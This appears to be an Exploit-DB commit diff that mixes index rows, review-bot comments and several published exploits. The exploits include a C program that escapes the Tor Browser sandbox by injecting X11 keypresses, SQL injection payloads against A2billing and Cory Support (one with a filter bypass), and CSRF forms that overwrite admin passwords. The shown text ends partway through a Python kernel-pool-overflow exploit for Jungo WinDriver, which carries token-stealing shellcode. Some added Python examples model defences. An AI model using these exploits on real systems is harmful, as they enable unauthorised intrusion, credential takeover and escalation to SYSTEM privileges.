42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
42615,platforms/php/webapps/42615.txt,"A2billing 2.x - SQL Injection",2017-09-05,0x4148,php,webapps,0
42616,platforms/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,php,webapps,0
42617,platforms/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps,0
42618,platforms/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",php,webapps,0
42619,platforms/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps,0
42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
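Review bot: the 42603 FineCMS row appears twice in this hunk with no visible difference, so it is either a whitespace/line-ending change or a duplicated CSV row; with the header counting four net additions, confirm that only one 42603 line remains in files.csv. Separately, 42616 is dated 2017-09-04 while its sibling 42615 is dated 2017-09-05, and the 42615 advisory attached in this commit gives 04/09/2017 as its public release; one of the two dates looks off.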

platforms/linux/local/42626.c

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2
**EDIT: I mixed up two different sandboxes; see the comment below for a correction.**
From inside the Linux sandbox described in
<https://blog.torproject.org/blog/tor-browser-70-released>, it is
still possible to talk to the X server without any restrictions.
This means that a compromised browser can e.g. use the
XTEST X protocol extension
(<https://www.x.org/releases/X11R7.7/doc/xextproto/xtest.html>) to
fake arbitrary keyboard and mouse events, directed at arbitrary
windows. This permits a sandbox breakout, e.g. by injecting keypresses
into a background window.
<https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux#HowdoIprotectmyselffromXexploits>
mentions that the X server is reachable, but it sounds like the author
didn't realize that a normal connection to the X server permits
sandbox breakouts by design.
To reproduce:
Install Debian Jessie with the Xfce4 desktop environment and with
backports enabled.
Install bubblewrap and xdotool.
Install the sandboxed Tor browser from
<https://www.torproject.org/dist/torbrowser/7.0a4/sandbox-0.0.6-linux64.zip>.
Launch the sandboxed Tor browser, use the default configuration. When
the browser has launched, close it.
Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.
Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c:
=========================
*/
#include <stdio.h>      /* perror */
#include <stdlib.h>     /* setenv */
#include <unistd.h>     /* fork, execl, sleep */
#include <sys/types.h>
#include <sys/wait.h>   /* wait */

/* Replacement for the sandboxed "firefox" binary: it only runs the bundled
 * xdotool three times, and the fake X events land on the host desktop. */
int main(void){
    int status;
    /* the copied libraries live next to xdotool inside the sandbox mount */
    setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1);
    /* 1. Alt+F2 opens the Xfce application finder; type the terminal name */
    if (fork() == 0) {
        execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL);
        perror("fail");
        return 0;
    }
    wait(&status);
    /* 2. confirm, then type "id" into the terminal that now has focus */
    if (fork() == 0) {
        execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL);
        perror("fail");
        return 0;
    }
    wait(&status);
    /* 3. press Return to run it */
    if (fork() == 0) {
        execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL);
        perror("fail");
        return 0;
    }
    wait(&status);
    /* keep the process alive so the launcher does not tear the sandbox down */
    while (1) sleep(1000);
    return 0;
}
/*
=========================
In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run
"gcc -static -o firefox firefox.c".
Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/".
Now run the launcher for the sandboxed browser again. Inside the
sandbox, the new firefox binary will connect to the X11 server and
send fake keypresses to open a terminal outside the sandbox and type
into it.
There are probably similar issues with pulseaudio when it's enabled;
I suspect that it's possible to e.g. use the pulseaudio socket to load
pulseaudio modules with arbitrary parameters, which would e.g. permit
leaking parts of files outside the sandbox by using them as
authentication cookie files for modules that implement audio streaming
over the network.
###################################################################
I mixed up two sandboxes.
The blog post <https://blog.torproject.org/blog/tor-browser-70-released> talks about the Firefox content process sandbox, which is still in development and unrelated to the Tor-specific sandbox I looked at. So the "content sandboxing" the blog post talks about isn't very effective yet; the Mozilla wiki points to multiple bug lists that document the remaining work (https://wiki.mozilla.org/Security/Sandbox#Bug_Lists).
The sandbox I looked at here is written and distributed by the Tor Project.
https://gitweb.torproject.org/tor-browser/sandboxed-tor-browser.git/commit/?id=1bfbd7cc1cd60c9468f2e33a3d4816973f1fb2f5 was added to mitigate the issue I reported by filtering X11 traffic and whitelisting permitted X protocol extensions.
More warnings have been added to the corresponding documentation (https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux?action=diff&version=23&old_version=21) that point out that this sandbox should not be used without manually configuring nested X11 and that pulseaudio is unsafe.
*/
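The report above hinges on the fact that an ordinary X11 connection already lets a client ask for and use XTEST, so the fix has to sit in front of the socket and filter requests. The probe below is an added example written for this page; it is not part of the Project Zero report, of the Tor Project's sandbox, or of the later filter. It speaks the raw X11 protocol over the display's Unix socket: the connection setup (with the MIT-MAGIC-COOKIE-1 for the display if an Xauthority file is readable), then a QueryExtension request for XTEST, which is exactly the request an extension whitelist must refuse. The socket directory /tmp/.X11-unix, the DISPLAY parsing and the Xauthority layout are assumptions about a standard Linux desktop.

```python
import os
import socket
import struct

X11_SOCKET_DIR = "/tmp/.X11-unix"      # assumption: the usual Unix-socket directory
QUERY_EXTENSION = 98                   # core protocol opcode for QueryExtension
MIT_COOKIE = b"MIT-MAGIC-COOKIE-1"


def pad4(n):
    """Padding that brings n up to a multiple of 4, as the X11 wire format requires."""
    return (4 - n % 4) % 4


def build_setup_request(auth_name=b"", auth_data=b""):
    """Connection setup from a little-endian client speaking protocol 11.0."""
    head = struct.pack("<BxHHHHxx", ord("l"), 11, 0, len(auth_name), len(auth_data))
    return (head + auth_name + b"\0" * pad4(len(auth_name))
            + auth_data + b"\0" * pad4(len(auth_data)))


def build_query_extension(name):
    """QueryExtension request: what an extension whitelist in front of the socket must inspect."""
    raw = name.encode("ascii")
    body = struct.pack("<Hxx", len(raw)) + raw + b"\0" * pad4(len(raw))
    return struct.pack("<BxH", QUERY_EXTENSION, (4 + len(body)) // 4) + body


def parse_query_extension_reply(reply):
    """Reply layout: type=1, pad, sequence(2), length(4), present, major-opcode, first-event, first-error."""
    if len(reply) < 32 or reply[0] != 1:
        raise ValueError("not a QueryExtension reply")
    present, major, first_event, first_error = struct.unpack_from("<4B", reply, 8)
    return {"present": bool(present), "major_opcode": major,
            "first_event": first_event, "first_error": first_error}


def parse_xauthority(data, display_number):
    """Find the MIT-MAGIC-COOKIE-1 entry for a display in Xauthority bytes (lengths are big-endian)."""
    off = 0
    try:
        while off + 2 <= len(data):
            off += 2                               # address family
            fields = []
            for _ in range(4):                     # address, display number, auth name, auth data
                (n,) = struct.unpack_from(">H", data, off)
                fields.append(data[off + 2:off + 2 + n])
                off += 2 + n
            if fields[1] == str(display_number).encode() and fields[2] == MIT_COOKIE:
                return MIT_COOKIE, fields[3]
    except struct.error:
        pass                                       # truncated file: behave as if no cookie
    return b"", b""


def find_cookie(display_number):
    path = os.environ.get("XAUTHORITY", os.path.expanduser("~/.Xauthority"))
    try:
        with open(path, "rb") as fh:
            return parse_xauthority(fh.read(), display_number)
    except OSError:
        return b"", b""                            # no cookie: try an unauthenticated setup


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("X server closed the connection")
        buf += chunk
    return buf


def probe_xtest(display=None):
    """Connect the way any client inside the sandbox would and ask whether XTEST is offered."""
    display = display or os.environ.get("DISPLAY", ":0")
    number = int(display.split(":")[1].split(".")[0])
    name, cookie = find_cookie(number)
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect("%s/X%d" % (X11_SOCKET_DIR, number))
    try:
        sock.sendall(build_setup_request(name, cookie))
        head = recv_exact(sock, 8)
        if head[0] != 1:                           # 0 = refused (bad cookie), 2 = more auth needed
            return None
        (additional,) = struct.unpack_from("<H", head, 6)
        recv_exact(sock, additional * 4)           # server details, not needed here
        sock.sendall(build_query_extension("XTEST"))
        return parse_query_extension_reply(recv_exact(sock, 32))
    finally:
        sock.close()


if __name__ == "__main__":
    result = probe_xtest()
    print("X server unreachable or refused the connection" if result is None else result)
```

Run it with DISPLAY set from inside the sandbox: a result with present=True means the browser process has everything the firefox.c above needs, since XTEST fake input needs no further permission once the connection is accepted. A filtering proxy can reject the request by opcode 98 plus the extension name, which is the approach the mitigation commit took.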

platforms/php/webapps/42615.txt

# Title : A2billing 2.x - SQL Injection Vulnerability
# Vulnerable software : A2billing 2.x
# Author : Ahmed sultan (0x4148)
# Email : 0x4148@gmail.com
# Linkedin : https://www.linkedin.com/in/0x4148/
For the deeper technical details (how the sanitization/hardening is bypassed, etc.), see the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/
A2billing is vulnerable to SQL injection because several inputs, including transactionID, are not sufficiently sanitized.
The sanitization differs from version to version, but the concept is the same: the bypass demonstrated here targets the latest version (2.1.1), and all versions released so far are vulnerable with slightly different modifications.
File : agent/public/checkout_process.php

getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency',
    'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency',
    'transaction_id', 'mc_fee', 'card_number'));
...................................................
// Status - New 0 ; Proceed 1 ; In Process 2
$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner,
          cc_number, cc_expires, creationdate, status, cvv, credit_card_type,
          currency " .
         " FROM cc_epayment_log_agent " .
         " WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND
         $NOW_2MIN))";
$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
POC :
Send the following POST body (the broken-up keywords are the sanitization bypass covered in the writeup; 0x706c75676e706179 is "plugnpay"):
transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268
to : https://HOST/a2billing/agent/Public/checkout_process.php
The application then redirects, and the Location header carries the decoded payment module name we injected into the query ("plugnpay"), which confirms that the injection succeeded.
Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA
Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release
Full exploit code is attached <loose code for demonstration purposes only>
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42615.zip
Thanks fly to R1z clan :)

platforms/php/webapps/42620.txt

# Exploit : Cory Support (pr) SQL Injection Vulnerability
# Author : v3n0m
# Contact : v3n0m[at]outlook[dot]com
# Date : September, 06-2017 GMT +7:00 Jakarta, Indonesia
# Developer : Cory App
# Software : Cory Support
# App Link : http://coryapp.com/?product&index
# Demo : http://coryapp.com/demo/support/
# Tested On : Mac OS Sierra v10.12.6
# Credits : YOGYACARDERLINK, Dhea Dayanaya Fathin Karima, Don't Touch Me (Line Group) & Muhammad Panji, Alfath Dirk, Cafe BMW & YOU !!
1. Description
An attacker can exploit this vulnerability to read from the database.
The parameter 'pr' is vulnerable.
2. Proof of Concept
http://domain.tld/[path]/listfaq.php?pr=9999+and+1=2+union+all+select+null,version()--
# Exploitation via SQLMap
Parameter: pr (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pr=1 AND 4809=4809
    Vector: AND [INFERENCE]

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: pr=1 UNION ALL SELECT NULL,CONCAT(0x7170706271,0x564f724b4475754c4c7a48714c59464c6c43704a636c6f72444471767a79716a6b6d4d6a72654b76,0x7170626b71)-- RNyi
    Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]
3. Security Risk
The security risk of this remote SQL injection vulnerability in Cory Support is estimated as high.
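The A2billing advisory above (42615.txt) shows the vulnerable query itself, with $transactionID concatenated straight into the WHERE clause, and the Cory Support sqlmap output shows the two standard ways such a flaw is confirmed: a boolean tautology pair and a UNION whose NULL column count is grown until the engine accepts it. The Python model below is an added example, not code from either advisory or from A2billing or Cory Support: it rebuilds the A2billing query over an in-memory SQLite table with the 13 columns listed in 42615.txt, runs both checks against it, places a value in column 5 the way the advisory's payload puts 0x706c75676e706179 ("plugnpay") in the paymentmethod position, and shows the hardened form (strict integer parse plus a bound parameter) rejecting the same input. The table row and the $NOW_2MIN stand-in are constructed; A2billing's keyword filter, which the advisory's split-keyword payload defeats, is not modelled.

```python
import sqlite3

# Column list taken from the A2billing query in 42615.txt.
COLUMNS = ("id", "agent_id", "amount", "vat", "paymentmethod", "cc_owner",
           "cc_number", "cc_expires", "creationdate", "status", "cvv",
           "credit_card_type", "currency")
SELECT_LIST = ", ".join(COLUMNS)

# Stand-in for A2billing's $NOW_2MIN (assumption: a "created in the last two minutes" test).
NOW_2MIN = "creationdate >= datetime('now', '-2 minutes')"


def make_db():
    """In-memory SQLite model of cc_epayment_log_agent holding one constructed row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cc_epayment_log_agent (%s)" % SELECT_LIST)
    db.execute("INSERT INTO cc_epayment_log_agent VALUES "
               "(1, 7, 10.0, 0, 'paypal', 'owner', 'n/a', 'n/a', datetime('now'), 0, '000', 'visa', 'EUR')")
    return db


def vulnerable_lookup(db, transaction_id):
    """Mirror of checkout_process.php: the raw transactionID is glued into the WHERE clause."""
    query = ("SELECT %s FROM cc_epayment_log_agent WHERE id = %s "
             "AND (status = 0 OR (status = 2 AND %s))" % (SELECT_LIST, transaction_id, NOW_2MIN))
    return db.execute(query).fetchall()


def hardened_lookup(db, transaction_id):
    """Fixed form: strict integer parse plus a bound parameter; the value can never become SQL."""
    tid = int(str(transaction_id).strip())        # ValueError for anything but an integer literal
    query = ("SELECT %s FROM cc_epayment_log_agent WHERE id = ? "
             "AND (status = 0 OR (status = 2 AND %s))" % (SELECT_LIST, NOW_2MIN))
    return db.execute(query, (tid,)).fetchall()


def boolean_blind_confirms(lookup, db, known_id):
    """sqlmap's 'AND boolean-based blind' check: a true and a false tautology must differ in result."""
    truthy = lookup(db, "%d AND 4809=4809" % known_id)
    falsy = lookup(db, "%d AND 4809=4810" % known_id)
    return len(truthy) == 1 and len(falsy) == 0


def find_union_columns(lookup, db, max_columns=32):
    """Grow 'UNION SELECT NULL,...' until the engine accepts it; that width is the column count."""
    for width in range(1, max_columns + 1):
        payload = "0 UNION SELECT %s -- " % ",".join(["NULL"] * width)
        try:
            lookup(db, payload)
            return width
        except sqlite3.OperationalError:          # column-count mismatch between the two SELECTs
            continue
    return None


def extract_via_union(lookup, db, width, position, expression):
    """Put an expression in one UNION column (the advisory places its module name in column 5)."""
    cells = ["NULL"] * width
    cells[position - 1] = expression
    rows = lookup(db, "0 UNION SELECT %s -- " % ",".join(cells))
    return rows[0][position - 1]
```

With the model in place, find_union_columns() lands on 13 and extract_via_union() returns whatever was placed in column 5, which is the same observation the advisory makes through the Location header. hardened_lookup() raises ValueError on every payload above before any SQL is built, which is the property to verify after patching: the identifier reaches the database only as a typed parameter.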

platforms/php/webapps/42621.html

# # # # #
# Exploit Title: Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin User&Pass)
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Advertiz-PHP-Script--No-Accounts-Required--i-2.html
# Demo: http://dijiteol.com/demos/advertiz/
# Version: 0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/editpersonal.php">
<!--Change admin username-->
<input name="login" type="text" size="20" maxlength="15" value="admin">
<!--Change admin password-->
<input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe">
<input type="submit" name="Submit" value="Update">
</form>
</body>
</html>
# # # # #

platforms/php/webapps/42622.html

# # # # #
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin User&Pass)
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html
# Demo: http://dijiteol.com/demos/pbtla
# Version: 1.0.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/editpersonal.php">
<!--Change admin username-->
<input name="login" type="text" size="20" maxlength="15" value="admin">
<!--Change admin password-->
<input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe">
<input type="submit" name="Submit" value="Update">
</form>
</body>
</html>
# # # # #
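Both proofs of concept above (42621 and 42622) work because admin/editpersonal.php accepts any authenticated POST carrying login and pass. The Python below is an added example, not code from either script or its vendor: a model of that handler as the PoC drives it, next to a hardened version that requires a per-session token compared in constant time and a same-origin Origin or Referer header. SITE_ORIGIN, and the dictionaries standing in for the PHP session, $_POST and the request headers, are assumptions.

```python
import hmac
import secrets

SITE_ORIGIN = "http://localhost"   # assumption: the host in the PoC's form action


def issue_csrf_token(session):
    """Create the per-session secret once; the real form would embed it as a hidden input."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def editpersonal_vulnerable(session, form):
    """Model of admin/editpersonal.php as the PoC drives it: a logged-in POST is all it takes."""
    session["admin"] = {"login": form["login"], "pass": form["pass"]}  # model of the stored credential
    return 200


def same_origin(headers):
    """Second line of defence: a cross-site form post carries the attacker's Origin (or Referer).
    A request with neither header is rejected; relax that only for endpoints that need it."""
    origin = headers.get("Origin") or headers.get("Referer", "")
    return origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def editpersonal_hardened(session, form, headers):
    """Same update, accepted only with a valid session-bound token and a same-origin request."""
    expected = session.get("csrf", "")
    supplied = form.get("csrf", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403                      # missing or wrong token: the PoC's form has none
    if not same_origin(headers):
        return 403                      # right token but posted from another site
    session["admin"] = {"login": form["login"], "pass": form["pass"]}
    return 200
```

The attacker's page cannot read the victim's token (same-origin policy keeps the form markup private), so the auto-submitted form from the PoC fails the first check; the Origin check catches the case where a token leaks through some other channel. Token generation uses secrets, and the comparison uses hmac.compare_digest so the check does not leak timing.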

platforms/php/webapps/42623.txt

# # # # #
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - SQL Injection
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html
# Demo: http://dijiteol.com/demos/pbtla
# Version: 1.0.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows users to inject SQL commands through the 'id' parameter.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?action=stats&id=[SQL]
#
# http://localhost/[PATH]/index.php?action=previewad&id=[SQL]
#
# Etc..
# # # # #


@ -1,7 +1,8 @@
/*
source: http://www.securityfocus.com/bid/7106/info
Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets.
Samba is prone to a buffer-overflow vulnerability when the '
' service tries to reassemble specially crafted SMB/CIFS packets.
An attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values.
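Review bot: the replacement for the third line of this hunk breaks the sentence: the removed line read "when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets" and the added pair has the service name replaced by a line break, so the file now says "when the '" followed by "' service tries to reassemble". This looks like the bulk 'smbd' title rename matching inside a file body; restore the removed line verbatim. The file header is not visible on this page, but the "source: http://www.securityfocus.com/bid/7106/info" context line identifies the advisory.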

platforms/windows/local/42624.py

# -*- coding: utf-8 -*-
"""
Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability
Download: http://www.jungo.com/st/products/windriver/
File: WD1240.EXE
Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba
Driver: windrvr1240.sys
Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
CVE: CVE-2017-14153
Author: Steven Seeley (mr_me) of Source Incite
Affected: <= v12.4.0
Thanks: b33f, ryujin and sickness
Analysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html
Summary:
========
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
Timeline:
=========
2017-08-22 Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
2017-08-25 No response from Jungo and two bounced emails
2017-08-26 Attempted a follow up with the vendor via website chat
2017-08-26 No response via the website chat
2017-09-03 Received an email from a Jungo representative stating that they are "looking into it"
2017-09-03 Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 No response from Jungo
2017-09-06 Public 0day release of advisory
Example:
========
C:\Users\Guest\Desktop>icacls poc.py
poc.py NT AUTHORITY\Authenticated Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
Mandatory Label\Low Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Guest\Desktop>whoami
debugee\guest
C:\Users\Guest\Desktop>poc.py
--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
Steven Seeley (mr_me) of Source Incite
(+) spraying pool with mixed objects...
(+) sprayed the pool!
(+) making pool holes...
(+) made the pool holes!
(+) allocating shellcode...
(+) allocated the shellcode!
(+) triggering pool overflow...
(+) allocating pool overflow input buffer
(+) elevating privileges!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Guest\Desktop>whoami
nt authority\system
C:\Users\Guest\Desktop>
"""
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time
from platform import release, architecture

ntdll = windll.ntdll
kernel32 = windll.kernel32

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0x0
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_INVALID_HANDLE = 0xC0000008
SystemExtendedHandleInformation = 64

class LSA_UNICODE_STRING(Structure):
    """Represent the LSA_UNICODE_STRING on ntdll."""
    _fields_ = [
        ("Length", USHORT),
        ("MaximumLength", USHORT),
        ("Buffer", LPWSTR),
    ]

class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
    """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
    _fields_ = [
        ("Object", c_void_p),
        ("UniqueProcessId", ULONG),
        ("HandleValue", ULONG),
        ("GrantedAccess", ULONG),
        ("CreatorBackTraceIndex", USHORT),
        ("ObjectTypeIndex", USHORT),
        ("HandleAttributes", ULONG),
        ("Reserved", ULONG),
    ]

class SYSTEM_HANDLE_INFORMATION_EX(Structure):
    """Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
    _fields_ = [
        ("NumberOfHandles", ULONG),
        ("Reserved", ULONG),
        ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
    ]

class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
    """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
    _fields_ = [
        ("Name", LSA_UNICODE_STRING),
        ("Reserved", ULONG * 22),
    ]

class PROCESSENTRY32(Structure):
    _fields_ = [
        ("dwSize", c_ulong),
        ("cntUsage", c_ulong),
        ("th32ProcessID", c_ulong),
        ("th32DefaultHeapID", c_int),
        ("th32ModuleID", c_ulong),
        ("cntThreads", c_ulong),
        ("th32ParentProcessID", c_ulong),
        ("pcPriClassBase", c_long),
        ("dwFlags", c_ulong),
        ("szExeFile", c_wchar * MAX_PATH)
    ]

Process32First = kernel32.Process32FirstW
Process32Next = kernel32.Process32NextW

def signed_to_unsigned(signed):
    """
    Convert signed to unsigned integer.
    """
    unsigned, = struct.unpack ("L", struct.pack ("l", signed))
    return unsigned
def get_type_info(handle):
    """
    Get the handle type information to find our sprayed objects.
    """
    public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
    size = DWORD(sizeof(public_object_type_information))
    while True:
        result = signed_to_unsigned(
            ntdll.NtQueryObject(
                handle, 2, byref(public_object_type_information), size, None))
        if result == STATUS_SUCCESS:
            return public_object_type_information.Name.Buffer
        elif result == STATUS_INFO_LENGTH_MISMATCH:
            size = DWORD(size.value * 4)
            resize(public_object_type_information, size.value)
        elif result == STATUS_INVALID_HANDLE:
            return None
        else:
            raise x_file_handles("NtQueryObject.2", hex (result))

def get_handles():
    """
    Return all the processes handles in the system at the time.
    Can be done from LI (Low Integrity) level on Windows 7 x86.
    """
    system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
    size = DWORD (sizeof (system_handle_information))
    while True:
        result = ntdll.NtQuerySystemInformation(
            SystemExtendedHandleInformation,
            byref(system_handle_information),
            size,
            byref(size)
        )
        result = signed_to_unsigned(result)
        if result == STATUS_SUCCESS:
            break
        elif result == STATUS_INFO_LENGTH_MISMATCH:
            size = DWORD(size.value * 4)
            resize(system_handle_information, size.value)
        else:
            raise x_file_handles("NtQuerySystemInformation", hex(result))
    pHandles = cast(
        system_handle_information.Handles,
        POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
            system_handle_information.NumberOfHandles)
    )
    for handle in pHandles.contents:
        yield handle.UniqueProcessId, handle.HandleValue, handle.Object
def we_can_alloc_shellcode():
    """
    This function allocates the shellcode @ the null page making
    sure the new OkayToCloseProcedure pointer points to shellcode.
    """
    baseadd = c_int(0x00000004)
    null_size = c_int(0x1000)
    tokenstealing = (
        "\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80"
        "\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04"
        "\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10"
        "\x00" )
    OkayToCloseProcedure = struct.pack("<L", 0x00000078)
    sc = "\x42" * 0x70 + OkayToCloseProcedure
    # first we restore our smashed TypeIndex
    sc += "\x83\xC6\x0c"                # add esi, 0c
    sc += "\xc7\x06\x0a\x00\x08\x00"    # mov [esi], 8000a
    sc += "\x83\xee\x0c"                # sub esi, 0c
    sc += tokenstealing
    sc += "\x90" * (0x400-len(sc))
